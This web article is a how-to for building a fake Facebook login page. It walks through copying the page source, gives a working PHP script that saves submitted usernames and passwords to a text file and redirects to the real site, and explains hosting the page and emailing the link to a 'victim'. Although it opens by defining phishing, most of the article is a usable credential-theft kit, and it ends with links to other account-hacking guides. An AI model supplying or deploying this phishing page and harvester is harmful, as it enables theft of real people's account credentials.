//

Facebook Phishing Email Examples and Facebook Email Scams

Phishing is a type of deception designed to steal your valuable personal data such as login details, credit card numbers, account data, or other information. Below we have put-up basic phishing mechanism used by hackers to make fake Facebook login pages.

fake facebook login page - Phisher

If you know HTML & PHP, you will find it very easy. Let’s see how simple it is to build and set up a fake login page and steal the password.

Phishing demonstration

Here’s what you will need:

1) A web hosting account 

There are hundreds of websites available that offer free web hosting account, normally 100mb free with a Subdomain. Create a free web hosting account with Subdomain on any of them. The problem with free hosting is that, as soon as they come to know that you have hosted phisher, they will Ban you. For this reason, it’s better to try this locally on your computer. Just google “How to host setup-up simple PHP website on Windows or Mac”, you will get tons of tutorials.

2) A fake login page

To create a fake Facebook login page, just goto the login page of Facebook, Right Click on that page and click on ‘view source’ or view ‘page source’. After this, a new window will open with the source code. just select all the code using ctrl+a and copy it with ctrl+c. open notepad and paste this code in it. and save it with extension .html on the desktop.
for eg:- facebook-login.html

3) A php code that writes data on to a text file

Just copy the below PHP code and paste it in a notepad. After this save it as a .php file on your desktop. For eg:- code.php

<?php
header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

4) A text file to save hacked Facebook passwords

Just create an empty text file, name it as password.txt and save it on the desktop.
note- if you don’t create a text file, the ‘fopen’ command in code.php will automatically create a new text file

Creating phisher

Now we have the 3 required files facebook-login.html, code.php, password.txt on the desktop.
The next task is to link(connect) the 3 files. such that we must link them in the order facebook-login.html >> code.php >> passwords.txt.

i.e. facebook-login.html must be able to communicate with code.php and further code.php must be able to communicate with passwords.txt

Linking facebook-login.html and code.php

Just open facebook-login.html with a text editor and search for ‘action’ field ( Press ctrl+F to search). Upon finding the ‘action’ field you will see something like this:

Fake Facebook login page

Replace everything in red with code.php, and save the file.

fake login page code

You just connected facebook-login.html to code.php

[ * ] There may be more than one action field. follow the same procedure of Replacing with code.php

Linking code.php and passwords.txt

In the above-given code, passwords.txt is already connected with code.php.

Now just open code.php with a text editor and in the 2nd line replace “original login page” with the Facebook login page of your phisher and save it.

You just told code.php to open passwords.txt file and after the victim enters the login details, redirect him to the original Facebook login page.
Now that everything is ready, the next step is to host the phisher that you just created on to a free web hosting server.

Steps in hosting phisher

  1. Login to your newly created free hosting account
  2. Click on ‘file manager’ to open file manager
  3. Now navigate to your subdomain directory. to do so just click on your subdomain in the files view area.
  4. Now just create a new directory(folder) and name it according to phisher you have created.
  5. Navigate to the desired directory that you just created in ‘step3’
  6. Upload all the 3 files, ie facebook-login.html,code.php,passwords.txt in this directory.
  7. Note – all the 3 files must be in the same directory.
  8. Copy the addresses of .html and .txt files
  9. Now Send this phisher to your Virtual-victim. just send the link (.html file’s address) via email or any other medium.
  10. Now ask your virtual-victim to log-in on your fake Facebook login page, the username and password gets stored in a test file ie. passwords.txt and now it can be opened any time to see the username and password.

That’s it! you are done. enjoy!

Related Posts:

  1. Practical ways to hack email password
  2. How to hack Facebook password
  3. Hacking WiFi hotspot password
  4. Finding Instagram users IP address
  5. Facebook fake account finder
  6. How to track Facebook user location
  7. Getting IP Address from Facebook Messenger App
  8. Facebook Hack Tool

Ashwin S

A cybersecurity enthusiast at heart with a passion for all things tech. Yet his creativity extends beyond the world of cybersecurity. With an innate love for design, he's always on the lookout for unique design concepts.